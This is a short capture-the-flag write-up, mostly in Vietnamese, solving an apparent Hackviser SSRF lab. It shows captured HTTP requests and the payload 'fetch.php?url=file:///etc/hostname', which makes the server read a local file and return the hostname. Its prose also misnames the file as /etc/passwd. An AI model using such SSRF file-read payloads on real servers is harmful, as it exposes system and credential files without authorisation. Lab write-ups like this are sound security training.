Basic SSRF Lab

Kiến thức để giải bài này tôi đã nói ở bài writeup trước (Exam Server-Side Request Forgery (SSRF)) .

This lab contains a Server-Side Request Forgery (SSRF) vulnerability in a PHP-based web application. To complete the lab, exploit the SSRF vulnerability in the URL parameter to obtain the server’s hostname information. What is the server’s hostname?

Ban đầu tôi mở Burp Suite lên và truy cập vào trang web , cũng như ở bài trước thì nó 1 request đầu , và sau đốn có thêm request đến server yêu server lấy ảnh cho nó :

GET / HTTP/1.1
Host: picked-captain.europe1.hackviser.space
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

Request lấy ảnh

GET /fetch.php?url=http://localhost/images/01.jpg HTTP/1.1
Host: picked-captain.europe1.hackviser.space
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://picked-captain.europe1.hackviser.space/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Priority: u=5
Te: trailers
Connection: keep-alive

Tôi đã dùng ppayload /fetch.php?url=file:///etc/hostname để yêu cầu server lấy nội dùng file /etc/passwd và gửi về cho tôi .

POST /fetch.php?url=file:///etc/hostname HTTP/1.1
Host: picked-captain.europe1.hackviser.space
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/plain,image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://picked-captain.europe1.hackviser.space/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Priority: u=5
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

Vì bài này cơ bản nên sẽ không có Blacklist hay ngăn chặn gì từ phía server . Reponse trả về như sau :

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Oct 2025 19:16:28 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 8
Connection: keep-alive
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff

reducto

==> The Answer is : reducto

Basic SSRF Lab

This is my writeup

Basic SSRF Lab

This lab contains a Server-Side Request Forgery (SSRF) vulnerability in a PHP-based web application. To complete the lab, exploit the SSRF vulnerability in the URL parameter to obtain the server’s hostname information. What is the server’s hostname?